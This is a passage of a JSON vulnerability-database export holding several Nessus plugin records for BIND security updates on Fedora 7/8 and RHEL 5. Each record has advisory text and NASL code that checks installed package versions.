Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-07-10T00:00:00", "title": "Fedora 8 : bind-9.5.0-28.P1.fc8 (2008-6281)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-6283"], "modified": "2008-07-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8"], "id": "FEDORA_2008-6281.NASL", "href": "https://www.tenable.com/plugins/nessus/33470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-6281.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33470);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"FEDORA\", value:\"2008-6281\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-28.P1.fc8 (2008-6281)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"9.5.0-P1 release which contains fix for CVE-2008-1447. This update\nalso fixes parsing of inner ACLs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=449345\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-July/012338.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4c3b108\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-28.P1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:18", "description": " - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-01-27T00:00:00", "title": "Fedora 8 : bind-9.5.0-23.b1.fc8 (2008-0903)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-01-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2008-0903.NASL", "href": "https://www.tenable.com/plugins/nessus/30080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-0903.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30080);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_xref(name:\"FEDORA\", value:\"2008-0903\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-23.b1.fc8 (2008-0903)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-January/007134.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0af33562\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-chroot-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-debuginfo-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-devel-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-libs-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-sdb-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-utils-9.5.0-23.b1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:18", "description": " - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the 
Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-01-27T00:00:00", "title": "Fedora 7 : bind-9.4.2-3.fc7 (2008-0904)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-01-27T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:bind", "p-cpe:/a:fedoraproject:fedora:caching-nameserver", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2008-0904.NASL", "href": "https://www.tenable.com/plugins/nessus/30081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-0904.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30081);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_xref(name:\"FEDORA\", value:\"2008-0904\");\n\n script_name(english:\"Fedora 7 : bind-9.4.2-3.fc7 (2008-0904)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=429149\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-January/007135.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1438dc61\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"bind-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-chroot-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-debuginfo-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-devel-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-libs-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-sdb-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-utils-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"caching-nameserver-9.4.2-3.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:08", "description": "Updated bind packages that fix two security issues, several bugs, and\nadd enhancements are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nIt was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n* when using an LDAP backend, missing function declarations caused\nsegmentation faults, due to stripped pointers on machines where\npointers are longer than integers.\n\n* starting named may have resulted in named crashing, due to a race\ncondition during D-BUS connection initialization. This has been\nresolved in these updated packages.\n\n* the named init script returned incorrect error codes, causing the\n'status' command to return an incorrect status. 
In these updated\npackages, the named init script is Linux Standard Base (LSB)\ncompliant.\n\n* in these updated packages, the 'rndc [command] [zone]' command,\nwhere [command] is an rndc command, and [zone] is the specified zone,\nwill find the [zone] if the zone is unique to all views.\n\n* the default named log rotation script did not work correctly when\nusing the bind-chroot package. In these updated packages, installing\nbind-chroot creates the symbolic link '/var/log/named.log', which\npoints to '/var/named/chroot/var/log/named.log', which resolves this\nissue.\n\n* a previous bind update incorrectly changed the permissions on the\n'/etc/openldap/schema/dnszone.schema' file to mode 640, instead of\nmode 644, which resulted in OpenLDAP not being able to start. In these\nupdated packages, the permissions are correctly set to mode 644.\n\n* the 'checkconfig' parameter was missing in the named usage report.\nFor example, running the 'service named' command did not return\n'checkconfig' in the list of available options.\n\n* due to a bug in the named init script not handling the rndc return\nvalue correctly, the 'service named stop' and 'service named restart'\ncommands failed on certain systems.\n\n* the bind-chroot spec file printed errors when running the '%pre' and\n'%post' sections. Errors such as the following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n* installing the bind-chroot package creates a '/dev/random' file in\nthe chroot environment; however, the '/dev/random' file had an\nincorrect SELinux label. Starting named resulted in an 'avc: denied {\ngetattr } for pid=[pid] comm='named' path='/dev/random'' error being\nlogged. 
The '/dev/random' file has the correct SELinux label in these\nupdated packages.\n\n* in certain situations, running the 'bind +trace' command resulted in\nrandom segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n* support has been added for GSS-TSIG (RFC 3645).\n\n* the 'named.root' file has been updated to reflect the new address\nfor L.ROOT-SERVERS.NET.\n\n* updates BIND to the latest 9.3 maintenance release.\n\nAll users of bind are advised to upgrade to these updated packages,\nwhich resolve these issues and add these enhancements.", "edition": 28, "published": "2008-05-22T00:00:00", "title": "RHEL 5 : bind (RHSA-2008:0300)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-05-22T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:caching-nameserver", "p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-sdb"], "id": "REDHAT-RHSA-2008-0300.NASL", "href": "https://www.tenable.com/plugins/nessus/32424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0300. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32424);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_bugtraq_id(27283);\n script_xref(name:\"RHSA\", value:\"2008:0300\");\n\n script_name(english:\"RHEL 5 : bind (RHSA-2008:0300)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix two security issues, several bugs, and\nadd enhancements are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nIt was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. 
(CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n* when using an LDAP backend, missing function declarations caused\nsegmentation faults, due to stripped pointers on machines where\npointers are longer than integers.\n\n* starting named may have resulted in named crashing, due to a race\ncondition during D-BUS connection initialization. This has been\nresolved in these updated packages.\n\n* the named init script returned incorrect error codes, causing the\n'status' command to return an incorrect status. In these updated\npackages, the named init script is Linux Standard Base (LSB)\ncompliant.\n\n* in these updated packages, the 'rndc [command] [zone]' command,\nwhere [command] is an rndc command, and [zone] is the specified zone,\nwill find the [zone] if the zone is unique to all views.\n\n* the default named log rotation script did not work correctly when\nusing the bind-chroot package. In these updated packages, installing\nbind-chroot creates the symbolic link '/var/log/named.log', which\npoints to '/var/named/chroot/var/log/named.log', which resolves this\nissue.\n\n* a previous bind update incorrectly changed the permissions on the\n'/etc/openldap/schema/dnszone.schema' file to mode 640, instead of\nmode 644, which resulted in OpenLDAP not being able to start. In these\nupdated packages, the permissions are correctly set to mode 644.\n\n* the 'checkconfig' parameter was missing in the named usage report.\nFor example, running the 'service named' command did not return\n'checkconfig' in the list of available options.\n\n* due to a bug in the named init script not handling the rndc return\nvalue correctly, the 'service named stop' and 'service named restart'\ncommands failed on certain systems.\n\n* the bind-chroot spec file printed errors when running the '%pre' and\n'%post' sections. 
Errors such as the following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n* installing the bind-chroot package creates a '/dev/random' file in\nthe chroot environment; however, the '/dev/random' file had an\nincorrect SELinux label. Starting named resulted in an 'avc: denied {\ngetattr } for pid=[pid] comm='named' path='/dev/random'' error being\nlogged. The '/dev/random' file has the correct SELinux label in these\nupdated packages.\n\n* in certain situations, running the 'bind +trace' command resulted in\nrandom segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n* support has been added for GSS-TSIG (RFC 3645).\n\n* the 'named.root' file has been updated to reflect the new address\nfor L.ROOT-SERVERS.NET.\n\n* updates BIND to the latest 9.3 maintenance release.\n\nAll users of bind are advised to upgrade to these updated packages,\nwhich resolve these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-6283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-0122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0300\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0300\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if 